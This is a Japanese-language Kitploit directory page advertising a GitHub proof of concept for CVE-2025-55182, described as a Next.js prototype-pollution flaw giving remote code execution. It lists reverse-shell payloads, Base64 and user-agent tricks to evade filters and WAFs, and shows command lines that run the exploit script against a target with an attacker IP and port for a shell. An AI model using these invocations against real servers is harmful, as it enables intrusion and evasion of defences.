Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-55182 — CVE-2025-55182 の PoC | Kitploit
ツール/GitHubGitHub/0xn7y/cve-2025-55182
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHub0xn7y/cve-2025-55182

CVE-2025-55182

CVE-2025-55182 の PoC

リポジトリを見る
8ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-55182 Next.js プロトタイプ汚染

CVE-2025-55182 は、nextjs における重大なプロトタイプ汚染の脆弱性であり、フレームワークのリクエスト処理機構における不適切な入力サニタイズを介して RCE を許容します。これは、nextjs が JSON オブジェクトを無知な初心者のように信頼しているために発生します。

POC

root@kitploit:~
1) リクエスト解析におけるプロトタイプ汚染: nextjs はプロトタイプチェーンを汚染可能なオブジェクトを不適切にサニタイズします。
2) 安全でないデシリアライゼーション: フレームワークは JSON オブジェクトがベースオブジェクトのプロトタイプを変更することを許可します。
3) プロトタイプチェーンを汚染することによる child_process を介した RCE: プロトタイプが汚染されると、ロジックを乗っ取ってサーバーに任意のコードを実行させることができます。

SetUp

root@kitploit:~
npm create [email protected] vuln

エクスプロイトコア機能

root@kitploit:~
1) リバースシェルペイロード: Linux/Win のリバースシェル
2) フィルターをすり抜けるための Base64 エンコーディング
3) 自動 OS 検出
4) WAF を回避するためのランダムユーザーエージェント
5) 失敗時の再試行ループ: 指数バックオフによる再試行
6) 信頼性向上のための同時エクスプロイト試行のマルチスレッド

Base64 エンコーディング (回避) を使用

root@kitploit:~
python exp_v2.py target 192.168.1.69 9001 --base64

再試行付きアグレッシブモード

root@kitploit:~
python exploit.py target 192.168.1.69 9001 --retries 5 --threads 3

ランダムユーザーエージェントの無効化

root@kitploit:~
python exploit.py target.com 192.168.1.69 9001 --no-spoof
ツールをダウンロード